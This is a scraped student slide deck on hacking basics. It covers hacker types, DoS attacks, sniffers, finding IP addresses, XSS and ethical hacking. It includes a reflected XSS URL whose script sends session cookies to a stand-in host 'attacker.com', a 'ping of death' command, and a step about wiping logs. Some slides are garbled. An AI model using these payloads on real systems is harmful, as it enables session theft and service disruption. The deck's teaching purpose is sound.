Upload
shakti-ranjan
View
331
Download
8
Embed Size (px)
Citation preview
HACKINGComputer Security
Team Presentation By:
Shakti Ranjan
What is Hacking?
HackingJust like burglars break into houses, hackers break into
computers. Do you ever wonder how hackers get inside your computer? How can you stop them?
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Types of hackers Professional hackers
Black Hats – the Bad Guys White Hats – Professional Security Experts
Script kiddies Mostly kids/students
User tools created by black hats, To get free stuff Impress their peers Not get caught
Underemployed Adult Hackers Former Script Kiddies
Can’t get employment in the field Want recognition in hacker community Big in eastern european countries
Ideological Hackers hack as a mechanism to promote some political or ideological purpose Usually coincide with political events
Hacker Terms
Hacking - showing computer expertise Cracking - breaching security on software or systems Phreaking - cracking telecom networks Spoofing - faking the originating IP address in a datagram Denial of Service (DoS) - flooding a host with sufficient
network traffic so that it can’t respond anymore Port Scanning - searching for vulnerabilities
Basic Hacking Skills
Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer
languages, you cant do hacking.
Get one of the open-source Unix's and learn to use and run it The single most important step any newbie can take towards acquiring hacker
skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal machine, and run it.
Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content -- it must be interesting and/or
useful to other hackers.
General Hacking Methods
A typical attacker works in the following manner:
1. Identify the target system.
1. Gathering Information on the target system.
1. Finding a possible loophole in the target system.
1. Exploiting this loophole using exploit code.
1. Removing all traces from the log files and escaping without a trace.
IP Addresses
Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network.
An IP Address is a 32-bit address which is divided into four fields of 8-bits each. For Example, 203.94.35.12
All data sent or received by a system will be addressed from or to the system.
An attacker’s first step is to find out the IP Address of the target system.
IP Addresses: Finding out an IP Address
A remote IP Address can easily be found out by any of the following methods:
Through Instant Messaging Software
Through Internet Relay Chat
Through Your website
Through Email Headers
Finding an IP Address via Instant Messengers
Case: If you are chatting on messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend’s system:
Your System------Chat Server---- Friend’s System
Friend’s System---------Chat Server------- Your System
Thus in this case, you first have to establish a direct connection with your friend’s computer by either sending him a file or by using the call feature.
Then, goto MSDOS or the command line and type:
C:\>netstat -n
This command will give you the IP Address of your friend’s computer.
Finding an IP Address via Email Headers
Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.
A Typical excerpt of such a Header of an email sent from a Hotmail account is:
Return-Path: <[email protected]>Received: from hotmail.com by sbcglobal.net (8.9.1/1.1.20.3/13Oct08-0620AM)
id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST)Message-ID: <[email protected]>Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, Sun,
12 OCT 2008 05:30:14 PSTX-Originating-IP: [202.xx.109.174]
IP Addresses: Dangers & Concerns
Dangers & Concerns
DOS Attacks Disconnect from the Internet Trojans Exploitation Geographical Information File Sharing Exploits
Various Types of Attacks
There are an endless number of attacks, which a system administrator has to protect his system from. However, the most common ones are:
Denial of Services attacks (DOS Attacks) Threat from Sniffing and Key Logging Trojan Attacks IP Spoofing Buffer Overflows All other types of Attacks
THREAT TO INDIA
Days after the international hacker group Anonymous brought down Reliance's internet services, the Computer Emergency Response Team India (CERT-In) has warned that websites of reputed
government and private organisations are under threat
"It is observed that some hacker groups are launching Distributed Denial of Service (DDoS) attacks on websites of government and private organisations in India.In a recent written reply in the Lok Sabha, Minister of State for Communications and IT Sachin Pilot said 112 government websites,
including that of Bharat Sanchar Nigam Ltd (BSNL), were hacked in just three months
"These attacks are being launched through popular DDoS tools and can consume bandwidth requiring appropriate proactive actions in coordination with service providers,"
Denial of Services (DOS) Attacks
DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system. In other words, a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users.
There are numerous types of Denial of Services Attacks or DOS Attacks.
DOS Attacks: Ping of Death Attack
The maximum packet size allowed to be transmitted by TCP\IP on a network is 65 536 bytes.
In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCP\IP, is sent to the target system.
As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs.
This attack can easily be executed by the ‘ping’ command as follows:
ping -l 65540 hostname
Threats from Sniffers and Key Loggers
Sniffers: capture all data packets being sent across the network in the raw form.
Commonly Used for:
Traffic Monitoring Network Trouble shooting Gathering Information on Attacker. For stealing company Secrets and sensitive data.
Commonly Available Sniffers
tcpdump Ethereal Dsniff
NETWORK HACKING
Overview of Internet Security
UIC Education Center 19
A Typical Hack
Internet
PublicDNS Server
2 22
2
Web Server (Internal Users)
DB Servers
DB Server
App Servers
TRUSTED eC SEGMENT
SAN
S/W Load Balancing
SAN
Firewall
DMZ
Web Servers
FTP Drop
H/W or S/WLoad
Balancing
2
4Firewall Firewall
Corporate LAN
Employees & Other Internal Users
Trusted Business Partners
Extranet Firewall
Level IV Data
Attacking other users: XSS
Reflected XSS User-input is reflected to web page
Common vulnerability is reflection of input for an error message Exploitation:
User logs in
Attacker feeds crafted URL
User requests attacker’s URL
Server responds with attacker’s Javascript
User’s browser sends session token to attacker
Attacker hijacks user’s session
Attacking other users: XSS
Reflected XSS Exploit:
1. User logs on as normal and obtains a session cookie2. Attacker feeds a URL to the user
https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</script>
3. The user requests from the application the URL fed to them by the attacker4. The server responds to the user’s request; the answer contains the javascript5. User browser receives and executes the javascript
var I = new Image; i.src=http://attacker.com/+document.cookie6. Code causes the user’s browser to make a request to attacker.com which
contains the current session token7. Attacker monitors requests to attacker.com and captures the token in order
to be able to perform arbitrary actions as the user
Attacking other users: XSS
Stored XSS Vulnerability
Attacker submits question containing malicious Javascript
User logs in and views attackers question
Server responds with attacker’s JavascriptAttacker’s Javascript
executes in user’s browser
User’s browser sends session token to attacker
Attacker hijacks user’s session
VulnerabilityWhat is a vulnerability?
Today’s computer software is very complex, comprised of thousands of lines of code. Since software is written by humans, it’s hardly surprising that they contain programming mistakes, known as vulnerabilities. These loopholes are used by hackers to break into systems; they are also used by authors of malicious code to launch their programs automatically on your computer.
Ethical Hacking Independent computer security
Professionals breaking into the computer systems.
Neither damage the target systems nor steal information.
Evaluate target systems security and report back to owners about the vulnerabilities found.
Ethical Hackers but not Criminal Hackers
Completely trustworthy. Strong programming and computer
networking skills. Learn about the system and trying to find
its weaknesses. Techniques of Criminal hackers-Detection-
Prevention. Published research papers or released
security software. No Ex-hackers.
Being Prepared What can an intruder see on the target systems? What can an intruder do with that information? Does anyone at the target notice the intruder's attempts or
successes?
1. What are you trying to protect? 2. Who are you trying to protect against? 3. How much time, effort, and money are you willing to
expend to obtain adequate protection?
Hands-On Ethical Hacking and Network Defense 27
Ethical hackers Employed by companies to perform penetration tests
Penetration test Legal attempt to break into a company’s network to find its
weakest link Tester only reports findings, does not solve problems
Security test More than an attempt to break in; also includes analyzing
company’s security policy and procedures Tester offers solutions to secure or protect the network
Hands-On Ethical Hacking and Network Defense 28
Hackers Access computer system or network without authorization Breaks the law; can go to prison
Crackers Break into systems to steal or destroy data U.S. Department of Justice calls both hackers
Ethical hacker Performs most of the same activities but with owner’s permission
Computer Crimes Financial Fraud Credit Card Theft Identity Theft Computer specific crimes
Denial-of-service Denial of access to information Viruses Melissa virus cost New Jersey man 20 months in jail
Melissa caused in excess of $80 Million Intellectual Property Offenses
Information theft Trafficking in pirated information Storing pirated information Compromising information Destroying information
Content related Offenses Hate crimes Harrassment Cyber-stalking
Child privacy
UIC Education Center 30
Question and Answer
Q&A
??
UIC Education Center 31
Suggestions!!..